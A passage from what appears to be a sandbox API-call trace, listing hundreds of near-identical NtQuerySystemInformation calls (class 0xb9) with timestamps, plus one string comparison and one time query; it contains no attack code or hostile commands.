Length=0x28, ResultLength=0x0) [0178.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x28, ResultLength=0x0) [0178.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x28, ResultLength=0x0) [0178.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x28, ResultLength=0x0) [0178.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff240, Length=0x28, ResultLength=0x0) [0178.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3c0, Length=0x28, ResultLength=0x0) [0178.847] _wcsicmp (_String1="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 0 [0178.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3c0, Length=0x28, ResultLength=0x0) [0178.848] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a67ff240 | out: lpSystemTimeAsFileTime=0xf7a67ff240*(dwLowDateTime=0xfcf68b19, dwHighDateTime=0x1d63873)) [0178.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2f0, Length=0x58, ResultLength=0x0) [0178.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1e0, Length=0x38, ResultLength=0x0) [0178.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x28, ResultLength=0x0) [0178.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x28, ResultLength=0x0) [0178.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x28, ResultLength=0x0) [0178.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x28, ResultLength=0x0) [0178.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff090, Length=0x28, ResultLength=0x0) [0178.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1e0, Length=0x38, ResultLength=0x0) [0178.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1e0, Length=0x38, ResultLength=0x0) [0178.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff110, Length=0x28, ResultLength=0x0) [0178.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff110, Length=0x28, ResultLength=0x0) [0178.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1e0, Length=0x38, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x20, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x20, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x20, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1e0, Length=0x38, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x20, ResultLength=0x0) [0178.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x20, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x20, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1e0, Length=0x38, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff000, Length=0x20, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff000, Length=0x20, ResultLength=0x0) [0178.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3c0, Length=0x28, ResultLength=0x0) [0178.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x20, ResultLength=0x0) [0178.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1f0, Length=0x20, ResultLength=0x0) [0178.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x20, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x20, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x20, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x20, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x20, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x20, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1f0, Length=0x20, ResultLength=0x0) [0178.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff4a0, Length=0x28, ResultLength=0x0) [0178.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff140, Length=0x28, ResultLength=0x0) [0178.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x28, ResultLength=0x0) [0178.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x28, ResultLength=0x0) [0178.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x20, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x20, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x20, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0a0, Length=0x20, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x20, ResultLength=0x0) [0178.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0b0, Length=0x20, ResultLength=0x0) [0178.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0b0, Length=0x20, ResultLength=0x0) [0178.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff140, Length=0x28, ResultLength=0x0) [0178.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x28, ResultLength=0x0) [0178.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x28, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff060, Length=0x20, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x20, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x20, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x20, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x20, ResultLength=0x0) [0178.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0b0, Length=0x20, ResultLength=0x0) [0178.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0b0, Length=0x20, ResultLength=0x0) [0178.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2a0, Length=0x38, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x28, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff140, Length=0x28, ResultLength=0x0) [0178.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.972] 